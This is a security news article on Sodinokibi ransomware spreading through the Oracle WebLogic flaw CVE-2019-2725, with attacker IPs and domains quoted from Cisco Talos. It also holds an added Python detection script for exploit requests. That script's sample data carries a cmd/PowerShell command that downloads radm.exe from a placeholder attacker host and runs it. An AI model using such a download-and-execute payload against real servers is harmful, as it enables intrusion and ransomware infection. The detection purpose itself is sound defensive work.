Oracle WebLogic Servers are not the usual targets of cyber attacks. The product occupies a niche and faces strong competition from the likes of Amazon with AWS and Google with its fleet of web services. This time, a new ransomware variant named Sodinokibi has penetrated WebLogic Servers by using a zero-day vulnerability as the loophole in their security. This is a new way to propagate ransomware, given that a typical ransomware infection requires the end-user to execute something: an email attachment, a drive-by download of malicious code, or a misrepresented MS Office file carrying a payload that downloads the ransomware to the machine.
Sodinokibi samples found on Oracle WebLogic Servers take advantage of a previously unknown vulnerability, then demand $2,500 worth of Bitcoin after encrypting all the user files found on the machine. Just like other ransomware, it gives the end-user a time-limited “offer” of two days to pay the ransom; delaying payment beyond the first 48 hours means the files can no longer be decrypted.
The worst part is that some variants of Sodinokibi include a companion malware, GandCrab. We had an extensive article about it last year, detailing how sophisticated it is in forcing users into submission and paying the ransom to recover their encrypted files. Oracle issued an emergency patch for CVE-2019-2725; however, not all customers who run WebLogic Servers were able to apply the patch on time.
“This vulnerability is easy for attackers to exploit, as anyone with HTTP access to the WebLogic server could carry out an attack. Because of this, the bug has a CVSS score of 9.8/10. Attackers have been making use of this exploit in the wild since at least April 17. Cisco’s Incident Response (IR) team, along with Cisco Talos, is actively investigating these attacks and Sodinokibi. Initial stages of the ransomware attack occurred on April 25, the day before Oracle released their update. On April 26, 2019, the attackers made an HTTP connection to a different vulnerable server, requesting the AsyncResponderService of the Oracle WebLogic Server,” explained Pierre Cadieux and colleagues from the Cisco Talos team, the cybersecurity arm of Cisco Networks, who investigated the incident.
The Talos team revealed prominent communication between the infected Oracle WebLogic Servers and two IP addresses allegedly controlled by Sodinokibi’s authors, 188.166.174(.)218 and 45.55.211(.)79, as well as a phishing domain, arg0s-co(.)uk, and a fake website domain, projectstore(.)guru.
“The other IP, 45.55.211[.]79, hosts a pair of legitimate Chilean domains, and appears to have been infected and repurposed by the attackers. The attackers were ultimately successful at encrypting a number of systems during this incident. Cisco IR Services and Talos observed the attack requests originating from 130.61.54[.]136. The HTTP POST request contained arguments to a cmd.exe instruction — a PowerShell command to download a file called “radm.exe” from host 188.166.74[.]218, then save that file locally and execute it,” added Cadieux.
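As an added example (not from this article, Cisco Talos, or Oracle), the following Python checker applies the detection logic implied by the quoted paragraphs to constructed WebLogic request records: it flags POST requests to the asynchronous web service path whose body carries a cmd.exe/PowerShell download-and-execute pattern like the one used to fetch radm.exe. The /_async/ and wls-wsat path patterns, the record field names and the sample records are assumptions made for the example.

```python
import re

# Constructed sample requests (not real captures). The body of the first one
# mimics the download-and-execute command described in the Talos write-up:
# cmd.exe invoking PowerShell to fetch "radm.exe" and run it. The host is a
# placeholder, not the indicator from the article.
SAMPLE_REQUESTS = [
    {"src": "203.0.113.10", "method": "POST", "path": "/_async/AsyncResponseService",
     "body": "cmd /c powershell -nop -w hidden (New-Object Net.WebClient)"
             ".DownloadFile('http://ATTACKER-HOST/radm.exe','C:\\Windows\\Temp\\radm.exe');"
             " Start-Process C:\\Windows\\Temp\\radm.exe"},
    {"src": "198.51.100.7", "method": "POST", "path": "/_async/AsyncResponseService",
     "body": "<soapenv:Envelope ...>legitimate async SOAP message</soapenv:Envelope>"},
    {"src": "192.0.2.5", "method": "GET", "path": "/console/login/LoginForm.jsp", "body": ""},
]

# Assumption: the async web service lives under /_async/ (the article calls it
# "AsyncResponderService"); wls-wsat is the other component covered by the patch.
VULN_PATHS = re.compile(r"/(_async/|wls-wsat/)", re.IGNORECASE)
SHELL_SPAWN = re.compile(r"\b(cmd(\.exe)?|powershell(\.exe)?)\b", re.IGNORECASE)
DOWNLOAD_CUE = re.compile(r"(DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|wget|curl|certutil)", re.IGNORECASE)
EXEC_CUE = re.compile(r"(Start-Process|\.exe\b|\biex\b|Invoke-Expression)", re.IGNORECASE)

def classify_request(req):
    """Return the reasons a request looks like CVE-2019-2725 exploitation; empty list if none."""
    reasons = []
    if req["method"].upper() == "POST" and VULN_PATHS.search(req["path"]):
        reasons.append("POST to patched async/wsat service path")
        body = req["body"]
        if SHELL_SPAWN.search(body):
            reasons.append("command shell spawn in request body")
        if DOWNLOAD_CUE.search(body):
            reasons.append("remote download cue in request body")
        if EXEC_CUE.search(body):
            reasons.append("execution cue in request body")
    return reasons

def suspicious_requests(requests):
    """Requests that hit the vulnerable path AND carry a shell/download/exec pattern."""
    hits = []
    for req in requests:
        reasons = classify_request(req)
        if len(reasons) >= 2:  # a path match alone is ordinary SOAP traffic
            hits.append((req["src"], reasons))
    return hits

if __name__ == "__main__":
    for src, reasons in suspicious_requests(SAMPLE_REQUESTS):
        print(src, "->", "; ".join(reasons))
```

A real deployment would feed this from the web tier's access logs or a reverse proxy that records POST bodies; the path match alone only narrows the traffic, so the shell and download cues are what turn a hit into an alert.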
The malicious Windows PowerShell commands download the following “support files”: